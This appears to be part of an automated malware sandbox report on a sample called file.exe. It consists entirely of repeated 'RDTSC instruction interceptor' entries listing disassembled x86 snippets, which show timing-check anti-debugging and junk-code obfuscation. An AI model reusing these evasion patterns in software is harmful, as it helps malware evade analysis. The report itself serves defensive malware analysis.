                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA0F1 second address: 12FA0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F9EA509B5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA769 second address: 12FA76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA76D second address: 12FA771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAC9F second address: 12FACA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FACA6 second address: 12FACCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D28E5h], ebx 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F9EA509B5DFh 0x00000014 push eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FACCA second address: 12FACCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB14E second address: 12FB1C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F9EA509B5E1h 0x0000000d pop edi 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D36A5h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F9EA509B5D8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F9EA509B5D8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d and esi, dword ptr [ebp+122D38AEh] 0x00000053 mov edi, dword ptr [ebp+122D37FEh] 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jl 00007F9EA509B5DCh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1C8 second address: 12FB1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBC4A second address: 12FBC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBAA2 second address: 12FBAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC40A second address: 12FC414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC414 second address: 12FC418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD6E4 second address: 12FD6EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD6EA second address: 12FD6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE015 second address: 12FE01B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF61A second address: 12FF620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDDB5 second address: 12FDDBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE866 second address: 12FE870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9EA4BB43C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF3D7 second address: 12FF3DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130380C second address: 130382A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F9EA4BB43C8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301FCC second address: 1301FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA509B5E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305A7A second address: 1305ACD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F9EA4BB43C8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push ecx 0x00000028 jl 00007F9EA4BB43C8h 0x0000002e mov bh, C1h 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 mov ebx, dword ptr [ebp+122D3792h] 0x00000039 mov edi, 7CB9F39Ch 0x0000003e push 00000000h 0x00000040 mov di, CBDFh 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305ACD second address: 1305AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9EA509B5D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305C4D second address: 1305C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305C51 second address: 1305C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B37 second address: 1307BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F9EA4BB43C8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 call 00007F9EA4BB43D4h 0x00000027 movzx ebx, cx 0x0000002a pop ebx 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e clc 0x0000002f sub dword ptr [ebp+122D2684h], ebx 0x00000035 popad 0x00000036 mov di, cx 0x00000039 push 00000000h 0x0000003b xchg eax, esi 0x0000003c jnp 00007F9EA4BB43CAh 0x00000042 push ebx 0x00000043 push eax 0x00000044 pop eax 0x00000045 pop ebx 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F9EA4BB43CAh 0x0000004f jnl 00007F9EA4BB43C6h 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1306D39 second address: 1306D62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9EA509B5DCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9EA509B5E3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1306D62 second address: 1306D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308B3A second address: 1308B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308B40 second address: 1308B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308B44 second address: 1308BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F9EA509B5E9h 0x0000000f nop 0x00000010 mov dword ptr [ebp+124502C1h], esi 0x00000016 push 00000000h 0x00000018 jmp 00007F9EA509B5E2h 0x0000001d call 00007F9EA509B5E6h 0x00000022 mov edi, 720A1F46h 0x00000027 pop ebx 0x00000028 push 00000000h 0x0000002a mov bh, D0h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F9EA509B5E3h 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007F9EA509B5E1h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9EA509B5E0h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308D42 second address: 1308DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jng 00007F9EA4BB43CCh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, 76B69563h 0x00000019 mov dword ptr [ebp+12473E3Dh], eax 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F9EA4BB43C8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 jnp 00007F9EA4BB43DEh 0x00000046 jmp 00007F9EA4BB43D8h 0x0000004b mov bx, si 0x0000004e mov eax, dword ptr [ebp+122D00D1h] 0x00000054 sub edi, dword ptr [ebp+122D2BF8h] 0x0000005a push FFFFFFFFh 0x0000005c mov bh, 3Ah 0x0000005e nop 0x0000005f jmp 00007F9EA4BB43D3h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F9EA4BB43D1h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B0D4 second address: 130B12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 mov ebx, 6A2C175Ah 0x0000000b push 00000000h 0x0000000d mov edi, dword ptr [ebp+122D395Eh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F9EA509B5D8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xchg eax, esi 0x00000030 jmp 00007F9EA509B5E2h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b jo 00007F9EA509B5D6h 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C195 second address: 130C199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C199 second address: 130C232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F9EA509B5E4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F9EA509B5D8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b pushad 0x0000002c sub ebx, dword ptr [ebp+122D388Eh] 0x00000032 mov ecx, dword ptr [ebp+122D3470h] 0x00000038 popad 0x00000039 push 00000000h 0x0000003b pushad 0x0000003c mov edx, dword ptr [ebp+122D2877h] 0x00000042 cmc 0x00000043 popad 0x00000044 jmp 00007F9EA509B5DEh 0x00000049 push 00000000h 0x0000004b mov edi, dword ptr [ebp+122DB6FFh] 0x00000051 jp 00007F9EA509B5DCh 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 push edi 0x0000005a push eax 0x0000005b pop eax 0x0000005c pop edi 0x0000005d jp 00007F9EA509B5D8h 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 pushad 0x00000069 popad 0x0000006a push esi 0x0000006b pop esi 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D2CC second address: 130D2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D2D0 second address: 130D303 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d call 00007F9EA509B5E7h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 mov bh, 2Bh 0x00000017 push 00000000h 0x00000019 mov ebx, ecx 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C483 second address: 130C497 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jg 00007F9EA4BB43C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C497 second address: 130C49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C49C second address: 130C4A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C4A1 second address: 130C4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E252 second address: 130E257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E257 second address: 130E25C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F1D6 second address: 130F1E0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F1E0 second address: 130F1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA509B5DBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F1EF second address: 130F1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F1F3 second address: 130F240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F9EA509B5D8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D2E0Eh], ecx 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+12478CACh], ecx 0x00000035 xchg eax, esi 0x00000036 push esi 0x00000037 jmp 00007F9EA509B5DAh 0x0000003c pop esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push edi 0x00000043 pop edi 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F240 second address: 130F24A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F24A second address: 130F24F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13111A4 second address: 13111B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13111B4 second address: 13111B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13111B8 second address: 131121B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sub bx, CA55h 0x0000000d push 00000000h 0x0000000f mov ebx, dword ptr [ebp+12473E3Dh] 0x00000015 push 00000000h 0x00000017 sbb bx, EDB8h 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e pushad 0x0000001f push edi 0x00000020 pop edi 0x00000021 jc 00007F9EA4BB43C6h 0x00000027 popad 0x00000028 pushad 0x00000029 jg 00007F9EA4BB43C6h 0x0000002f jmp 00007F9EA4BB43D2h 0x00000034 popad 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F9EA4BB43D9h 0x0000003f push eax 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131044A second address: 131045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311421 second address: 1311426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1314220 second address: 131422A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131422A second address: 131423B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313533 second address: 1313539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313539 second address: 131353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131513E second address: 131514D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131514D second address: 1315152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1314425 second address: 1314429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1314429 second address: 131442F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131442F second address: 1314435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13152E4 second address: 131534A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244C702h], edx 0x00000011 mov edi, dword ptr [ebp+122D2357h] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+122D319Fh] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b sub dword ptr [ebp+122D1D60h], edi 0x00000031 mov eax, dword ptr [ebp+122D00E5h] 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F9EA4BB43C8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov di, dx 0x00000056 nop 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jp 00007F9EA4BB43C6h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131795B second address: 131795F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E35C second address: 131E360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E360 second address: 131E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9EA509B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E64F second address: 131E658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E7A2 second address: 131E7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E7A8 second address: 131E7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E7AC second address: 131E7B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1326EE2 second address: 1326EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1326EE8 second address: 1326EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1326EEC second address: 1326F05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F957 second address: 132F967 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F9EA509B5D6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E64D second address: 132E688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9EA4BB43C6h 0x0000000a jmp 00007F9EA4BB43D8h 0x0000000f popad 0x00000010 jnp 00007F9EA4BB43D2h 0x00000016 ja 00007F9EA4BB43C6h 0x0000001c jg 00007F9EA4BB43C6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E688 second address: 132E699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
